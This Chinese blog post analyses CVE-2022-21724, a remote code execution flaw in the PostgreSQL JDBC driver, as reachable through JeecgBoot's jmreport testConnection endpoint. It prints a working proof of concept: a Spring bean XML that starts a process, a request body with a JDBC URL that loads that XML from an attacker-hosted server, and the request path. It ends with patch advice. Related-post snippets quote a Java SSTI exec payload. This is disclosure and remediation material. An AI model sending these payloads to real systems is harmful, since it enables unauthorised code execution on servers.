jeecg-boot/jmreport 积木报表基于SSTI的任意代码执行漏洞、PostgresQL JDBC Drive 任意代码执行漏洞(CVE-2022-21724)

已于 2023-12-13 09:16:52 修改
阅读量728 收藏 8
点赞数 9
文章标签: postgresql 数据库 jmreport
于 2023-12-13 09:12:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/geniusbluesky/article/details/134963122
版权

PostgresQL JDBC Drive 任意代码执行漏洞(CVE-2022-21724)

JDBC Java 数据库连接,(Java Database Connectivity)是 Java 语言中用来规范客户端如何访问数据库的应用程序接口,具体讲就是通过 Java 连接广泛数据库,并对表中数据执行增、删、改、查等操作的技术。

当程序中 JDBC 连接 URL 可控时,可能会造成安全问题。比较具有代表性的就是 JDBC 反序列化漏洞,是在于 mysql 数据库连接时产生的。

漏洞简介

在 PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。 pgjdbc 根据通过 authenticationPluginClassName、sslhostnameverifier、socketFactory 、sslfactory、sslpasswordcallback 连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。

影响范围:

9.4.1208 <=PgJDBC <42.2.25

42.3.0 <=PgJDBC < 42.3.2

漏洞重现

xml文件
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
   <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg value="calc" />
        <property name="whatever" value="#{ pb.start() }"/>
    </bean>
</beans>
参数
{"dbDriver":"org.postgresql.Driver",
"dbUrl":"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=https://yourIp:3000/bean.xml",
"dbName": "mysql",
"dbUsername":"1",
"dbPassword":"1"}

请求路径

192.168.88.2:9999/jeecg-boot/jmreport/testConnection

在这里插入图片描述

解决方案

1.升级 postgresql
<postgresql.version>42.3.2</postgresql.version>
2.ShiroConfig 权限控制 关闭
filterChainDefinitionMap.put(“/jmreport/**”, “anon”)

geniusbluesky
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jeecg-boot/积木报表系统testConnection接口存在远程命令执行漏洞 附POC
nnn2188185的博客
12-19 1774
JeecgBoot 是一款开源的的低代码开发平台,积木报表是其中的低代码报表组件。
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 1548
JeecgBoot 的 jeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码
漏洞复现--JeecgBoot testConnection 远程代码执行
qq_53003652的博客
12-20 2310
JeecgBoot 是一款基于代码生成器的低代码开发平台,该产品存在testConnection 远程命令执行漏洞。JeecgBoot积木报表
JeecgBoot testConnection存在远程命令执行漏洞
weixin_62352348的博客
01-13 530
JeecgBoot testConnection存在远程命令执行漏洞
Goby漏洞更新 jeecg-boot 未授权SQL注入漏洞CVE-2024-1454)
最新发布
2301_77033672的博客
04-17 290
攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!企业Web应用程序的Java低代码平台JEECG-Boot(v3.5.0)最新未经授权的SQL注入。JeecgBoot是一款基于代码生成器的低代码开发平台。
jeecg-boot sql注入漏洞解决
宁波阿成的博客
07-18 2518
jeecg-boot sql注入漏洞解决
JeecgBoot jmreport/loadTableData RCE漏洞复现
qq_36334672的博客
02-04 1053
Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。
【高危】 jeecg-boot/积木报表基于H2驱动的任意代码执行漏洞
murphysec的博客
08-17 984
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。
nbcio-boot3.1 解决积木报表基于SSTI任意代码执行漏洞积木报表版本从1.4.0升级到最新的1.6.1
宁波阿成的博客
08-17 737
nbcio-boot3.1 解决积木报表基于SSTI任意代码执行漏洞积木报表版本从1.4.0升级到最新的1.6.1
漏洞复现】JeecgBoot testConnection 远程命令执行漏洞
weixin_45530380的博客
12-27 1379
漏洞复现】JeecgBoot testConnection 远程命令执行漏洞
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效... 在规模最大的一端,攻击者可以潜在地实现远程代码执行,完全控制后端服务器,并使用它对内部基础结构执行其他攻击。 即使
White-box-pentesting:创建此实验室的目的是演示哈希传递,盲SQL和SSTI漏洞
05-10
从而导致哈希和管理员帐户被接管admin at search选项中的SSTI漏洞会导致RCE你的目标进行源代码审查以查找以下漏洞并登录到管理员帐户。 并获得反向外壳。 您可以通过电子邮件将您的发现和脚本的演练通过电子邮件发送...
scant3r:ScanT3r-网络安全扫描仪
03-16
Scant3r-Web应用程序漏洞扫描程序为什么要使用Scant3r? scant3r将帮助您更快地编写自己的python脚本,无需配置http / threads / errors / options / etc ...,只需在脚本中编写main函数,即可在终端中运行它或访问...
Blind_SPOT:盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入,SSTI
05-30
盲点盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入,SSTI要求 :- Python3 请求和 colorama 库用法 :- -u ===>目标网址在您的注入区域或参数中添加 [*] -p payload_list ,有 r zahir009 ...
这款star数21.5k的开源项目(jeecg-boot)是怎么写出196个漏洞的?
xierqijianke的专栏
04-01 1459
一个开源的低代码平台项目咋写出来196个漏洞
Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454】
holyxp的博客
07-02 4491
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
JeecgBoot jmreport/loadTableData RCE漏洞复现(CVE-2023-41544)
0xSec
01-31 1083
​JeecgBootjmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
Spring框架爆RCE 0day漏洞的临时解决方案
qq_45752401的博客
03-30 589
3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行(RCE),使用JDK9及以上版本皆有可能受到影响。 漏洞描述: 作为目前全球最受欢迎的Java轻量级开源框架,Spring允许开发人员专注于业务逻辑,简化Java企业级应用的开发周期。 但在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve.
CVE-2023-21966
08-11
CVE-2023-21966是关于Strapi软件中的一个漏洞。根据引用,该漏洞被称为Strapi <4.5.6远程代码执行漏洞,属于代码注入类型的漏洞。该漏洞影响范围广泛。然而,根据引用,Strapi 4.5.6之前的版本中,存在一个与用户权限相关的插件的电子邮件模板系统的服务器端模板注入(SSTI漏洞。攻击者如果有访问Strapi管理面板的权限,可以在电子邮件模板中插入恶意JavaScript代码,并在API账户注册时执行该恶意代码。因此,CVE-2023-21966与Strapi的电子邮件模板系统存在的SSTI漏洞有关。123 #### 引用[.reference_title] - *1* *2* *3* [【严重】Strapi 远程代码执行漏洞(POC)(CVE-2023-22621)](https://blog.csdn.net/murphysec/article/details/130423334)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值